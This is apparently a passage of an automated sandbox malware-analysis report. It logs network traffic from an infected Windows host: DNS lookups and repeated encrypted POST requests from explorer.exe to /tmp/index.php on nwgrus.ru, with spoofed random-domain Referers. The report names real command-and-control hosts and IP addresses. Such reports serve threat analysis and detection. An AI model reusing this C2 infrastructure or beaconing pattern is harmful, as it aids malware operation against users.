                                                            Oct 11, 2024 06:40:46.048918962 CEST5085880192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:46.053699970 CEST8050858186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:46.053898096 CEST8050858186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:47.321197987 CEST8050858186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:47.322803974 CEST8050858186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:47.322863102 CEST5085880192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:47.324803114 CEST5085880192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:47.329617977 CEST8050858186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:58.694946051 CEST5085980192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:58.699784994 CEST8050859186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:58.699861050 CEST5085980192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:58.699985027 CEST5085980192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:58.699999094 CEST5085980192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:58.704843998 CEST8050859186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:58.704989910 CEST8050859186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:59.976272106 CEST8050859186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:59.976911068 CEST8050859186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:59.977004051 CEST5085980192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:41:00.294946909 CEST5085980192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:41:00.299911976 CEST8050859186.233.231.45192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 11, 2024 06:37:17.954185963 CEST53651211.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:37:23.740147114 CEST5150453192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:37:24.727827072 CEST5150453192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:37:25.732738972 CEST5150453192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:37:26.077781916 CEST53515041.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:37:26.077836037 CEST53515041.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:37:26.077867031 CEST53515041.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:38:25.757343054 CEST5119853192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:38:25.766674995 CEST53511981.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:38:25.769102097 CEST6307153192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:38:25.778225899 CEST53630711.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:39:35.412800074 CEST5168553192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:39:35.572805882 CEST53516851.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:39:35.588800907 CEST6199053192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:39:35.618767977 CEST53619901.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:39:42.691665888 CEST5520253192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:39:42.722254038 CEST53552021.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:39:42.743160963 CEST5085853192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:39:42.752224922 CEST53508581.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:39:51.860150099 CEST4949453192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:39:51.869596004 CEST53494941.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:39:51.891098976 CEST6045453192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:39:51.899645090 CEST53604541.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:00.900077105 CEST5727353192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:00.908900976 CEST53572731.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:00.911233902 CEST6187953192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:00.920773983 CEST53618791.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:05.143913031 CEST5895253192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:06.159843922 CEST5895253192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:07.173728943 CEST5895253192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:07.579562902 CEST53589521.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:07.579612970 CEST53589521.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:07.579642057 CEST53589521.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:11.929418087 CEST5193953192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:11.938009024 CEST53519391.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:11.940094948 CEST5345153192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:11.949914932 CEST53534511.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:23.756772041 CEST5477453192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:24.138183117 CEST53547741.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:24.165797949 CEST5928153192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:24.174705029 CEST53592811.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:35.699882984 CEST6004053192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:35.730027914 CEST53600401.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:35.756925106 CEST5337953192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:35.766896963 CEST53533791.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:46.941129923 CEST6292753192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:46.950917959 CEST53629271.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:46.991712093 CEST6021553192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:47.022749901 CEST53602151.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:58.694205999 CEST5522653192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:58.724173069 CEST53552261.1.1.1192.168.2.4
                                                            Oct 11, 2024 06:40:58.757436037 CEST6311153192.168.2.41.1.1.1
                                                            Oct 11, 2024 06:40:58.911050081 CEST53631111.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 11, 2024 06:37:23.740147114 CEST192.168.2.41.1.1.10xa53eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:24.727827072 CEST192.168.2.41.1.1.10xa53eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:25.732738972 CEST192.168.2.41.1.1.10xa53eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:38:25.757343054 CEST192.168.2.41.1.1.10x195dStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:38:25.769102097 CEST192.168.2.41.1.1.10x782aStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:35.412800074 CEST192.168.2.41.1.1.10xcaa7Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:35.588800907 CEST192.168.2.41.1.1.10xe7aaStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:42.691665888 CEST192.168.2.41.1.1.10xdeeStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:42.743160963 CEST192.168.2.41.1.1.10xccf5Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:51.860150099 CEST192.168.2.41.1.1.10x2fd8Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:51.891098976 CEST192.168.2.41.1.1.10x2db5Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:00.900077105 CEST192.168.2.41.1.1.10xf918Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:00.911233902 CEST192.168.2.41.1.1.10xd224Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:05.143913031 CEST192.168.2.41.1.1.10xbb0dStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:06.159843922 CEST192.168.2.41.1.1.10xbb0dStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.173728943 CEST192.168.2.41.1.1.10xbb0dStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:11.929418087 CEST192.168.2.41.1.1.10xf9c7Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:11.940094948 CEST192.168.2.41.1.1.10x4b5dStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:23.756772041 CEST192.168.2.41.1.1.10x4d22Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:24.165797949 CEST192.168.2.41.1.1.10x8dbaStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:35.699882984 CEST192.168.2.41.1.1.10x54f0Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:35.756925106 CEST192.168.2.41.1.1.10xc4a6Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:46.941129923 CEST192.168.2.41.1.1.10xc059Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:46.991712093 CEST192.168.2.41.1.1.10x7881Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:58.694205999 CEST192.168.2.41.1.1.10x56baStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:58.757436037 CEST192.168.2.41.1.1.10x51a1Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077781916 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077836037 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:37:26.077867031 CEST1.1.1.1192.168.2.40xa53eNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:38:25.766674995 CEST1.1.1.1192.168.2.40x195dName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:38:25.778225899 CEST1.1.1.1192.168.2.40x782aName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:35.572805882 CEST1.1.1.1192.168.2.40xcaa7Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:35.618767977 CEST1.1.1.1192.168.2.40xe7aaName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:42.722254038 CEST1.1.1.1192.168.2.40xdeeName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:42.752224922 CEST1.1.1.1192.168.2.40xccf5Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:51.869596004 CEST1.1.1.1192.168.2.40x2fd8Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:39:51.899645090 CEST1.1.1.1192.168.2.40x2db5Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:00.908900976 CEST1.1.1.1192.168.2.40xf918Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:00.920773983 CEST1.1.1.1192.168.2.40xd224Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579562902 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579612970 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:07.579642057 CEST1.1.1.1192.168.2.40xbb0dNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:11.938009024 CEST1.1.1.1192.168.2.40xf9c7Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:11.949914932 CEST1.1.1.1192.168.2.40x4b5dName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:24.138183117 CEST1.1.1.1192.168.2.40x4d22Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:24.174705029 CEST1.1.1.1192.168.2.40x8dbaName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:35.730027914 CEST1.1.1.1192.168.2.40x54f0Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:35.766896963 CEST1.1.1.1192.168.2.40xc4a6Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:46.950917959 CEST1.1.1.1192.168.2.40xc059Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:47.022749901 CEST1.1.1.1192.168.2.40x7881Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:58.724173069 CEST1.1.1.1192.168.2.40x56baName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                            Oct 11, 2024 06:40:58.911050081 CEST1.1.1.1192.168.2.40x51a1Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                            • 23.145.40.164
                                                            • fxxmebwwqsmoglpj.com
                                                              • nwgrus.ru
                                                            • uwmajrkjinpjtb.com
                                                            • vdgnwysksin.net
                                                            • mnxigvfksbogudg.com
                                                            • kixruudymeg.net
                                                            • noqnaadfmcqiqh.net
                                                            • xgcqobnogyn.org
                                                            • tkdovmgcqkpkau.com
                                                            • jdcljhdxiwgilrm.org
                                                            • ktpfbekvdosn.net
                                                            • egphyymsnbbon.net
                                                            • aedejmbyprcj.org
                                                            • hvawqwmqdyhhbuvh.net
                                                            • pmvtliwpktklau.com
                                                            • faxctnknnkusgdi.net
                                                            • lsncadftghcgkll.org
                                                            • lpydjvblecmmk.org
                                                            • iepqpqyryvhgtcv.org
                                                            • oenjfnfpfgckga.org
                                                            • nufhygmjiointcnq.com
                                                            • hsidmskxdmqv.org
                                                            • tnccrjrkqwl.org
                                                            • ttovpyftqljtjbyu.net
                                                            • rajflukkjfv.net
                                                            • toscrejivnmddao.net
                                                            • xkeohrrlcufnjh.net
                                                            • wmgqjswjxdwbrcxb.com
                                                            • kfvlpgkryjcljktf.net
                                                            • qcmpeqxglbq.net
                                                            • xorfrgussemjiclx.org
                                                            • bpaltdgxnlbrc.org
                                                            • ourjknfcrerebmfy.net
                                                            • wijyucejeixqcq.org
                                                            • tvxqtlroqjamdu.net
                                                            • qiqpuprruvmqycfg.com
                                                            • ducngusiibkxomb.org
                                                            • itbfgbtaejscu.org
                                                            • fmklqfxisct.com
                                                            • ukccamwydghjkfi.org
                                                            • nkxctepgnvx.org
                                                            • ijdjdfrkcsdu.com
                                                            • virsnusoyawwgc.com
                                                            • mtnalmdiriqcam.com
                                                            • chjuadirxhpxkwiq.net
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.450549116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:26.087119102 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://fxxmebwwqsmoglpj.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 279
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:26.087151051 CEST279OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 0b ef 89
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vu2=;"H2|cX9G0G9;5mI%V_l0y]9=ZhH14XYmicBf0mX4+[f
                                                            Oct 11, 2024 06:37:27.330255032 CEST152INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:27 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 04 00 00 00 72 e8 87 ee
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.450550116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:27.339456081 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://uwmajrkjinpjtb.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 328
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:27.339489937 CEST328OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 49 c1 a2
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vudIiOuimR3opPe~qN]&/]TtwW2{c2a7I\g&v(0OWZhe{kRZS/@P`8
                                                            Oct 11, 2024 06:37:28.608561039 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:28 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
